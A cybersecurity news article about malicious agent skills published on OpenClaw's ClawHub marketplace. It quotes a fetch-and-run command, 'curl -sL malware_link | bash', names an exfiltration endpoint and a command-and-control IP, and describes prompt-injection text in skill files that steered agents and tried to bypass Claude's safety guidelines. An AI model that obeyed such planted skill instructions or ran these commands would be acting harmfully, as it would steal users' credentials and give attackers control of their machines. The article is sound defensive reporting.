OpenClaw’s Top Skill is a Malware that Stole SSH Keys, and Opened Reverse Shells in 1,184 Packages

The most downloaded AI agent skill on OpenClaw’s ClawHub marketplace was functional malware, not a productivity tool.

OpenClaw, an open-source AI agent platform, operates a public skill marketplace called ClawHub, where third-party developers can publish plugins, or “skills,” that extend an agent’s capabilities.

Security researcher @chiefofautism has identified 1,184 malicious skills on OpenClaw’s ClawHub marketplace, with a single threat actor responsible for uploading 677 packages alone, exposing a catastrophic supply chain vulnerability at the heart of the AI agent ecosystem.

The problem: ClawHub allowed anyone to publish with nothing more than a one-week-old GitHub account as verification. Attackers exploited this low barrier to flood the registry with malicious skills disguised as crypto trading bots, YouTube summarizers, and wallet trackers — all with professionally written documentation designed to appear legitimate.

Hidden inside the SKILL.md files were AI prompt instructions engineered to trick the agent into advising users to run commands like:

curl -sL malware_link | bash

On macOS, that single command deployed Atomic Stealer (AMOS), a commodity infostealer that grabbed browser passwords, SSH keys, Telegram sessions, crypto wallet keys, keychain data, and every API key stored in .env files. On other systems, the malware opened a reverse shell, granting the attacker full remote control of the victim’s machine.

Cisco’s AI Defense team ran their Skill Scanner against the top-ranked community skill on ClawHub, a skill called “What Would Elon Do?” that had been artificially gamed to reach the #1 spot. The scan returned 9 security vulnerabilities: 2 Critical, 5 High, and 2 Medium.

The skill silently exfiltrated user data via a curl command to an attacker-controlled server (https://clawbub-skill.com/log), running with output redirected to /dev/null to avoid detection. It also embedded prompt injection payloads to bypass Claude’s safety guidelines — all while being downloaded thousands of times.vallettasoftware+1

This crisis did not emerge overnight. Koi Security had previously audited 2,857 ClawHub skills and found 341 malicious entries, nearly 12% of the entire registry, with 335 linked to a single coordinated campaign codenamed ClawHavoc.

Snyk’s separate audit also identified 341 malicious skills, and a single publisher, “hightower6eu,” uploaded over 314 malicious packages with nearly 7,000 downloads across those entries. All identified malicious skills shared a common command-and-control server at 91.92.242.30.

OpenClaw has since enlisted Google’s VirusTotal to scan all uploaded skills, categorizing them as benign, suspicious, or malicious — with daily re-scans to catch skills that may mutate post-approval.

This is the AI-era equivalent of npm supply chain attacks, with one critical difference: the malicious package operates inside an AI agent with broad system permissions, file access, and the ability to execute terminal commands autonomously.

The attack surface is not a binary payload; it’s encoded in natural language instructions that traditional endpoint detection tools cannot parse or flag.

Organizations running OpenClaw in enterprise environments face a compounded “Shadow AI” risk, where agent-executed actions leave minimal audit trails and bypass conventional proxy-based monitoring.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.